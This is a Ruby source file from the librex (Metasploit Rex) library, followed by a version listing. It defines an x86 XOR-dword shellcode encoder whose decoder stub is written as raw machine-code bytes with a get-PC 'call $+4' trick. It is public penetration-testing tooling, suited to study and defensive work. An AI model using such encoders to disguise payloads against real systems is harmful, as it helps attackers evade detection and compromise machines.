Contents

#!/usr/bin/env ruby

require 'rex/arch/x86'
require 'rex/encoder/xor/dword'

module Rex
module Encoders

###
#
# Spoon's smaller variable-length encoder (updated to use call $+4 by vlad902)
#
###
class XorDword < Rex::Encoder::Xor::Dword
	module Backend
		def _prepend
			# set the counter to the rounded up number of dwords to decode
			Rex::Arch::X86.set(
				Rex::Arch::X86::ECX,
				(encoded.length - 1 >> 2) + 1,
				badchars
			) +
			"\xe8\xff\xff\xff" +                # call $+4
			"\xff\xc0" +                        # inc eax
			"\x5e" +                            # pop esi
			"\x81\x76\x0e" + key +              # xor_xor: xor [esi + 0x0e], $xorkey
			"\x83\xee\xfc" +                    # sub esi, -4
			"\xe2\xf4"                          # loop xor_xor
		end
	end

	include Backend
end

end end

Version data entries

43 entries across 43 versions & 1 rubygems

Version	Path
librex-0.0.65	lib/rex/encoders/xor_dword.rb
librex-0.0.63	lib/rex/encoders/xor_dword.rb
librex-0.0.54	lib/rex/encoders/xor_dword.rb
librex-0.0.53	lib/rex/encoders/xor_dword.rb
librex-0.0.52	lib/rex/encoders/xor_dword.rb
librex-0.0.51	lib/rex/encoders/xor_dword.rb
librex-0.0.50	lib/rex/encoders/xor_dword.rb
librex-0.0.49	lib/rex/encoders/xor_dword.rb
librex-0.0.48	lib/rex/encoders/xor_dword.rb
librex-0.0.47	lib/rex/encoders/xor_dword.rb
librex-0.0.46	lib/rex/encoders/xor_dword.rb
librex-0.0.44	lib/rex/encoders/xor_dword.rb
librex-0.0.43	lib/rex/encoders/xor_dword.rb
librex-0.0.42	lib/rex/encoders/xor_dword.rb
librex-0.0.41	lib/rex/encoders/xor_dword.rb
librex-0.0.40	lib/rex/encoders/xor_dword.rb
librex-0.0.39	lib/rex/encoders/xor_dword.rb
librex-0.0.38	lib/rex/encoders/xor_dword.rb
librex-0.0.37	lib/rex/encoders/xor_dword.rb
librex-0.0.36	lib/rex/encoders/xor_dword.rb